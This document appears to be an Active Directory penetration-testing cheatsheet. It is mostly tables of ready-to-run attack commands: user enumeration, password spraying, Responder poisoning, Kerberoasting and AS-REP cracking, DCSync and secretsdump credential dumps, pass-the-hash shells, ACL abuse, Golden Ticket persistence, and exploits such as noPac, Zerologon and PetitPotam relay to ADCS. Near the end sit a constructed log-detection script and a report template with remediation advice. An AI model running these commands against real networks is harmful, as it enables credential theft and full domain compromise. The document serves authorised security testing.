Methodology Checklist
- Unauthenticated: Kerbrute user enum, NULL sessions, LLMNR poisoning
- Get first credential: password spray (check policy!), AS-REP roast, anonymous LDAP
- BloodHound collection: bloodhound-python (Linux) or SharpHound (Windows)
- Kerberoasting: GetUserSPNs → crack → assess admin membership
- Credentialed enum: PowerView, windapsearch, Snaffler for share secrets
- ACL abuse: GenericAll / WriteDACL / WriteOwner chains from BloodHound
- Privileged access: DCSync, NTDS dump, Golden Ticket if krbtgt obtained
- Bleeding edge CVEs: NoPac, PetitPotam, PrintNightmare, ZeroLogon
Operational Context
Use when: AD engagement. Master reference for all AD attack and enumeration commands, organized by phase.
Think Dumber First: Bookmark this file. Every AD technique has a command here. Use Ctrl+F to find the right command for the current phase rather than switching contexts.
Skip when: N/A (master reference document).
Tactical Cheatsheet
Initial Enumeration & Discovery
| Command | Tactical Outcome |
|---|---|
| kerbrute userenum -d [DOMAIN] --dc [DC_IP] users.txt | Kerberos user enumeration (no lockout) |
| nxc smb [DC_IP] -u '' -p '' --users | NULL session → list domain users |
| nxc smb [DC_IP] -u '' -p '' --pass-pol | NULL session → password policy |
| rpcclient -U "" -N [DC_IP] → enumdomusers | RPC NULL session user enumeration |
| enum4linux-ng [DC_IP] | Full SMB/RPC enumeration |
| ldapsearch -x -H ldap://[DC_IP] -b "DC=[DOMAIN],DC=[TLD]" | Anonymous LDAP dump |
| sudo responder -I [IFACE] -wdv | LLMNR/NBT-NS poisoning → NTLMv2 capture |
Password Attacks
| Command | Tactical Outcome |
|---|---|
| kerbrute passwordspray -d [DOMAIN] --dc [DC_IP] users.txt [PASS] | Password spray via Kerberos |
| nxc smb [DC_IP] -u users.txt -p [PASS] --continue-on-success | SMB spray |
| nxc smb [DC_IP] -u users.txt -p passwords.txt --no-bruteforce | Credential stuffing |
| DomainPasswordSpray.ps1 -Password [PASS] | Windows-based spray (auto-skips locked accounts) |
| hashcat -m 5600 hashes.txt rockyou.txt | Crack NTLMv2 (Responder captures) |
BloodHound Data Collection
| Command | Tactical Outcome |
|---|---|
| bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All | Linux ingestor, all collection methods |
| .\SharpHound.exe -c All --zipfilename loot.zip | Windows ingestor |
| nxc ldap [DC] -u [USER] -p [PASS] --bloodhound -ns [DC_IP] -c All | Direct LDAP collection, no host touch |
| nxc smb [TARGET] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe | Deploy SharpHound via NXC |
| nxc smb [TARGET] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All" | Execute SharpHound via NXC |
| nxc smb [TARGET] -u [USER] -p [PASS] --get-file [ZIP_FILENAME] bloodhound.zip | Retrieve collection results |
Kerberos Attacks
| Command | Tactical Outcome |
|---|---|
| impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request | Kerberoasting: list SPN accounts + request TGS |
| Rubeus.exe kerberoast /outfile:hashes.txt /nowrap | Kerberoasting from Windows |
| hashcat -m 13100 hashes.txt rockyou.txt | Crack TGS (Kerberoast, RC4 etype 23) |
| hashcat -m 19700 hashes.txt rockyou.txt | Crack AES-256 TGS (Kerberoast, etype 18) |
| impacket-GetNPUsers [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt | AS-REP roasting (unauthenticated) |
| Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt | AS-REP roasting from Windows |
| hashcat -m 18200 asrep.txt rockyou.txt | Crack AS-REP hashes |
| Rubeus.exe asktgt /user:[USER] /password:[PASS] /domain:[DOMAIN] | Request TGT |
| Rubeus.exe ptt /ticket:[BASE64_TICKET] | Pass-the-Ticket (import to memory) |
Credentialed Enumeration
| Command | Tactical Outcome |
|---|---|
| Get-DomainUser -SPN | PowerView: Kerberoastable accounts |
| Get-DomainUser -PreauthNotRequired | PowerView: AS-REP roastable accounts |
| Get-DomainGroup -AdminCount | PowerView: privileged groups |
| Get-DomainComputer -Unconstrained | PowerView: unconstrained delegation hosts |
| windapsearch --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da | Linux LDAP: Domain Admins |
| .\Snaffler.exe -s -o snaffler.txt | Hunt share secrets across the domain |
Credential Extraction & Lateral Movement
| Command | Tactical Outcome |
|---|---|
| impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Remote SAM/LSA/NTDS dump |
| impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm | DCSync: all domain NTLM hashes |
| lsadump::dcsync /domain:[DOMAIN_FQDN] /user:[DOMAIN]\krbtgt | Mimikatz DCSync |
| nxc smb [TARGET] -u [USER] -H [NTLM_HASH] | Pass-the-Hash via NXC |
| impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[NTLM_HASH] | PtH: SYSTEM shell |
| evil-winrm -i [TARGET] -u [USER] -p [PASS] | WinRM interactive shell |
| impacket-wmiexec [DOMAIN]/[USER]:[PASS]@[TARGET] | WMI execution |
ACL Abuse
| Command | Tactical Outcome |
|---|---|
| Get-DomainObjectAcl -Identity [USER] -ResolveGUIDs | PowerView: show ACEs on object |
| Set-DomainUserPassword -Identity [TARGET_USER] -AccountPassword (ConvertTo-SecureString "[PASS]" -AsPlainText -Force) | ForceChangePassword abuse |
| Set-DomainObject -Identity [USER] -Set @{serviceprincipalname='fake/spn'} | WriteSPN: make target Kerberoastable |
| Add-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | AddSelf/AddMembers: add user to privileged group |
| Add-DomainObjectAcl -TargetIdentity "DC=[DOMAIN]" -PrincipalIdentity [USER] -Rights DCSync | WriteDACL: grant self DCSync |
| Set-DomainObject -Identity [USER] -Clear serviceprincipalname | Cleanup: remove fake SPN after Kerberoast |
Bleeding Edge / CVEs
| Command | Tactical Outcome |
|---|---|
| nxc smb [DC_IP] -u '' -p '' -M zerologon | CVE-2020-1472 Zerologon: unauth DA check (safe-test first; exploit is destructive) |
| noPac.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -dc-host [DC_HOST] --impersonate Administrator -use-ldap -dump | CVE-2021-42278/42287 noPac: DA |
| rpcdump.py @[DC_IP] \| egrep 'MS-RPRN\|MS-PAR' | CVE-2021-34527 PrintNightmare: check spooler exposed |
| PetitPotam.py [LHOST] [DC_IP] | NTLM coercion (+ ntlmrelayx to ADCS) |
| impacket-ntlmrelayx -t http://[ADCS]/certsrv/certfnsh.asp -smb2support --adcs --template DomainController | Relay to ADCS for cert |
| nmap --script smb-vuln-ms17-010 -p 445 [TARGET] | EternalBlue check |
Deep Dive & Workflow
Standard AD Attack Chain
1. NULL sessions / Kerbrute → user list
2. LLMNR poisoning (Responder) → NTLMv2 → crack
   OR password spray (1 attempt per lockout window)
3. First credential → BloodHound collection
4. Review BH paths: owned → DA
5. Kerberoasting (if SPN accounts exist) → crack → escalate
6. ACL abuse chain (if BH shows a path)
7. DCSync/secretsdump from DA account
8. Dump krbtgt → Golden Ticket (persistence)
BloodHound Priority Queries
"Shortest Paths to Domain Admins from Owned Principals"
"Find AS-REP Roastable Users (Owned Principals)"
"Shortest Paths from Kerberoastable Users"
"Users with DCSync Rights"
"Find Computers with Unconstrained Delegation"
"Transitive Object Control"
Hash Mode Reference
| Mode | Hash Type |
|---|---|
| 1000 | NTLM |
| 5600 | NTLMv2 (Net-NTLMv2, Responder captures) |
| 13100 | Kerberos TGS (Kerberoast, RC4 etype 23) |
| 19700 | Kerberos TGS (Kerberoast, AES-256 etype 18) |
| 18200 | Kerberos AS-REP (AS-REP Roast) |
| 2100 | DCC2 (Domain Cached Credentials) |
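The Kerberos Attacks table and the hash-mode reference above both hinge on the same two conditions: service tickets issued with RC4 (etype 23, mode 13100) and TGTs issued without pre-authentication (mode 18200). The following detection helper is an added example, not part of this cheatsheet; it runs over constructed, simplified records (key=value stand-ins for the real Event ID 4769/4768 fields Ticket Encryption Type and Pre-Authentication Type) and flags the footprint that GetUserSPNs -request / Rubeus kerberoast and GetNPUsers leave on a domain controller.

```python
from collections import defaultdict

# Constructed, simplified Security-log records (not a real export).
# 4769 = service ticket (TGS) requested, 4768 = TGT requested.
# etype 0x17 = RC4-HMAC (Kerberoast mode 13100), 0x12 = AES-256 (mode 19700).
# preauth=0 on a 4768 means the account does not require pre-authentication.
SAMPLE_EVENTS = [
    "id=4769 user=jdoe svc=svc_sql etype=0x12 ip=10.0.0.5",
    "id=4769 user=jdoe svc=svc_sql etype=0x17 ip=10.0.0.5",
    "id=4769 user=jdoe svc=svc_web etype=0x17 ip=10.0.0.5",
    "id=4769 user=jdoe svc=svc_backup etype=0x17 ip=10.0.0.5",
    "id=4769 user=asmith svc=svc_sql etype=0x12 ip=10.0.0.9",
    "id=4768 user=svc_legacy preauth=0 etype=0x17 ip=10.0.0.5",
    "id=4768 user=asmith preauth=2 etype=0x12 ip=10.0.0.9",
]

RC4_ETYPE = "0x17"


def parse_event(line):
    """Split one key=value record into a dict (constructed format)."""
    return dict(field.split("=", 1) for field in line.split())


def kerberoast_suspects(events, min_spns=2):
    """Map requester -> sorted service names for requesters that obtained
    RC4 (etype 23) service tickets for at least min_spns distinct services.
    One RC4 ticket can be a legacy client; a fan-out across many SPNs from
    one principal is the bulk-request pattern of a Kerberoast sweep."""
    rc4_by_user = defaultdict(set)
    for ev in map(parse_event, events):
        if ev.get("id") == "4769" and ev.get("etype") == RC4_ETYPE:
            rc4_by_user[ev["user"]].add(ev["svc"])
    return {u: sorted(s) for u, s in rc4_by_user.items() if len(s) >= min_spns}


def asrep_roast_suspects(events):
    """Return accounts issued a TGT with Pre-Authentication Type 0: exactly
    the accounts GetNPUsers / Rubeus asreproast can harvest (mode 18200)."""
    return sorted({ev["user"] for ev in map(parse_event, events)
                   if ev.get("id") == "4768" and ev.get("preauth") == "0"})


if __name__ == "__main__":
    print("Kerberoast sweep suspects:", kerberoast_suspects(SAMPLE_EVENTS))
    print("AS-REP roastable accounts seen:", asrep_roast_suspects(SAMPLE_EVENTS))
```

Accounts surfaced by the second function are the ones to move off "Do not require Kerberos preauthentication"; accounts whose SPNs recur in the first are the ones to migrate to AES-only keys or group Managed Service Accounts.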
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Command not found in cheatsheet | New tool or technique | Add new commands to cheatsheet as discovered; keep it current |
| Tool version changed command syntax | Flag changes between versions | Verify with --help; nxc and impacket tools update frequently |
| Command works in lab but not engagement | Environment differences | Note environment-specific requirements (domain name, DC IP) as parameters |
| Multiple commands for same task | Unsure which to use | Use the first command listed; it is the most reliable, and the alternatives are fallbacks |
| Cheatsheet command times out | Network conditions | Adjust timeouts: nxc --timeout 30; impacket add -timeout 30 |
Reporting Trigger
Finding Title: AD Attack Chain Executed: Domain Compromise Achieved
Impact: Complete Active Directory compromise achieved through chained exploitation of multiple AD vulnerabilities, including LLMNR poisoning, Kerberoasting, DCSync, and privilege escalation, demonstrating defense-in-depth failures across the AD environment.
Root Cause: Multiple compounding AD misconfigurations enabled chained exploitation from initial network access to complete domain compromise.
Recommendation: Address each identified attack vector independently. Prioritize: disabling LLMNR/NBT-NS, hardening Kerberoastable service accounts, enforcing SMB signing, restricting NTLM, and deploying Microsoft Defender for Identity.